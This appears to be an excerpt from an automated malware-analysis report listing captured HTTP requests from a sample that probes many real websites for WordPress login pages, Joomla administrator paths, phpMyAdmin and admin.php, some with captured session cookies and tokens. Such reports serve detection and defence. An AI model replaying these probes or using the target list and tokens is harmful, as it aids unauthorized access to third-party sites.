Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipCookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.maxiv.lu.se/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://micro-design.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://himontessori.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.ceuandalucia.es/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/wp-login.php HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /saml/index.php?page=%2Fadministrator%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=3dbfg2bnrmlhvmjhpi48421sg2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /concord/PhpMyAdmin/ HTTP/1.1Host: kidsrkids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.knu.ac.in/administrator/
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Ik9iRDZCclQ1UEJFcVRhU0M0Z2JWd0E9PSIsInZhbHVlIjoiLzhpMDY3eGRpRmFYNGZsVG5UN01DUGY3cGlYalNpc0lBVWhIc2o2VWlrQWRpV21uR01FVEJXSCszQTg5UTlDQk83RytmS296VWZQZGk4UGZlaE10QlpUa29sV3E5OG1rMzdZV2tNWEZscnUwK2k1NVpvR0hJOWswKzNPMTRXV3giLCJtYWMiOiJmZThhNzk4NzM0NGI2YWIwMzkzYzBiOGIzNTdkNjk5YTA2NDFlM2E0ZGY2ZGNkNTBmNTI4YTRkNDUzODhiMTMwIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InNSUUdPSlJvRjI4SU9XL0o1aG5yTmc9PSIsInZhbHVlIjoiaDROU2VITEgzb3IwMm1QU1FWM0hlZE94NWVBMW4vSEczTlN3YTBWc3had20wWmljdkJ2RHdJRWk3SFk3UHhGTGh5Nis5dzl2UlVNSW40cU9wWG5sZ0lyVkc0eUg2a3BJbTd2VWZwZjBkdDBWNDcrbDBKTHBrazg5S3E5cHdlQXYiLCJtYWMiOiI4ZjljNzY5YTJmMjg3Nzg5ZDk1ZGRhZTk4YzBlNGVhNTVmZWM3NGE3M2FjNjM5NWMxNDhhNjU2ODU5NDdlNzZkIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkI1ejVQMUpRYWxNcjgranNNVTBURFE9PSIsInZhbHVlIjoid3hpb3hCWENGcnU0M0ZDYktoTjAzMDQyOE8vZjRUUXJ2NjRuRzJ4Z0FtWitaNG00ckFqM0xzc1NHdWx5SGVwbzhPcldyUU5zK2hJMGVHUXlYQjBHcnM2WXVYUEZIS2hPKzA5UDl5dEoyRzUvYmkveVoxcHBJcmo5MVI3M0xjeUkiLCJtYWMiOiJiNDcwN2IyNzZjYzUyMzhmOTAyMzQ2ZmEwMjM0MTMwZmUzN2Y4ZTczNThjZmZiZGQ1NGU0MTcyN2Y3MTZiYWY0IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Imo1aVN2WVJmWnBrNnZqSXJrYXFoblE9PSIsInZhbHVlIjoidVNWYlV1bDRTdmFsRnQ0anV4Zy9kK3RTUXdEQVFwV1I5OXo1Z0hKUTBWbWxoeFNDUGEwM3F0d1Y2d29pZFZoZm5GQUloWURIUW1SRUo0aHQ5Ry8xTEhUejRwYndPNVlGSDdtbXZMUkxVbjcwNmxQTVpKSnV1dVZsQ3B5ajZnOTkiLCJtYWMiOiJjZWU3NTQ4MWIwNzUyNDE5MDQ3NWZjNGY3YjYwMWJiZjMwNzk4ZDZmOGU2ZjFhYTNkNzA5N2RkOTgwNzBlMmJiIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InZhbDJwVnlLUWhubGJIVTRxS1RyS3c9PSIsInZhbHVlIjoibEtHV0dCVjhVZFFxdXVPckRoandqSmJIM2VpRWo3WkE2ejZGY2pQbU5MVDEyaUwxT3czZzd6T2tYUFc2WjNmYm83eGJpaCtkTnU2eW1zMmcxN3N5eHJlbjdPL1drOGwyOUw5TjhsM0k1MnBoWDhYOHJucU5VWGN6Z3lZOC9qejUiLCJtYWMiOiJkYmI0NTNiNTQ5YzNhYzUxNjUyMDM2MWNlM2QzYzYxNGMyZTJhMWY2MzYyYWNiN2JjNzQ2ODI5NzJlMjU2MGQ0IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkxXaFVUaFNtTzd2ZGkvek9mQ0hvQmc9PSIsInZhbHVlIjoiZmhtK2lrVUlvZjdVZHpFVWVmMjR6b0VFRVYwWWdxaXNkRmpTQ202R0hubjNUM2czRThCblFXTXNOVjhQNC9kdS8yMmhialBBNGtpcW05eDZ0NDJzMGFDZ2VUemRuU2dvU01pdUNUdGEwc0wvUFRqdUt3MFl6RFlkblFaTWhZQy8iLCJtYWMiOiI2ZTM3MmEwZmUyNWQ5ZDgyYTFhNWQwMDg4OWNkNTdlNmI5ZDJhZmM1MzcwMzM3NDgxZjBlNDI5MTllNTVlN2VjIiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.gatewaytoearlylearning.com/administrator
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gruporegiosafety.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://jamiesonmullin.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ce-logic.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.linkan-group.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.2brospw.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /en/wp-admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.dstaq.com/en/wp-login.php
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=robinsonland.com
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://webstamp.ca/wp-login.php
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.knu.ac.inAccept: */*Accept-Encoding: deflate, gzipCookie: laravel_session=eyJpdiI6IldVSVdPNGdUR2JDN2tFR2tvcjMzVXc9PSIsInZhbHVlIjoiR29jOElPY2pHK2ZKdjF3WnkwSWljS0sxNjMyc3Rrb3RZM0hsRHU0ZU1HN05jaEV6UVQyL2RLajNSV0VZYllpU2VObUhVVEdQVDE5OHRHUlZ1czZtOWozL0FJSUNFOTFTM255UW5tbzJ2MVhrdnp3VWgrUS9abDhpN1VkSW1SdDQiLCJtYWMiOiI1NmYxZWE0YTI5ZmE1NzcxMGY4NjhmMGJkZDFlOTcyZWNiYTIyMWQ0Nzk1N2RhMzgyYzNjYjhjMzMxOTIxMjM3In0%3D; XSRF-TOKEN=eyJpdiI6IkFPalpTRG5rdmUxUmNpVVMyVW9VL0E9PSIsInZhbHVlIjoiVmN5VjBEN0doZmxEdWNNOXh2RVFoUzNjb0pHcEdNZDZ2ay9zaWladjB5bmtoMk5HcTloeWZBb0p0aXBnK2kvQTVrOHpkOW8yelBQTmYzZDN0bWQwNnFnZENVTXN5OVBIdnJwYk9TTGpCa1o5TXZaMWZkZ1ZtdXIwcXdhMjFmZlQiLCJtYWMiOiI5OGQyNjEwOGYxMmJlNjUzZDYxZTEyMjM3ZjEzMWJkM2E0NjU0NzE5MzYyYjAyMTA5ZmY5MGY3NDZkNmI4NTk1In0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.knu.ac.in/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://unaj.edu.pe/wp-login.php
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=3dbfg2bnrmlhvmjhpi48421sg2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.beachrecruitment.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=O9GVX4jId9RJuNoELP6FOmLes7L1Dv_lQ.oZC7Kt.D0-1700978377959-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=8ce644f91f3f0aa94249a98a8e2141b0|11f187638643e13d7bd1963991fac52b; OF=ggr72avlfjvqinhaol7mprbv57User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: integraledu.hrAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=8257809a7475c7fa7752a0e86fe7cff7User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=R0qqCwK.17oONu7RjBLPHjggdQkWTgT9UHD8GB3iYHI-1700978378407-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.bunasta.eu/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.debritto.sch.idAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.avient.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://esoft.academy/wp-login.php
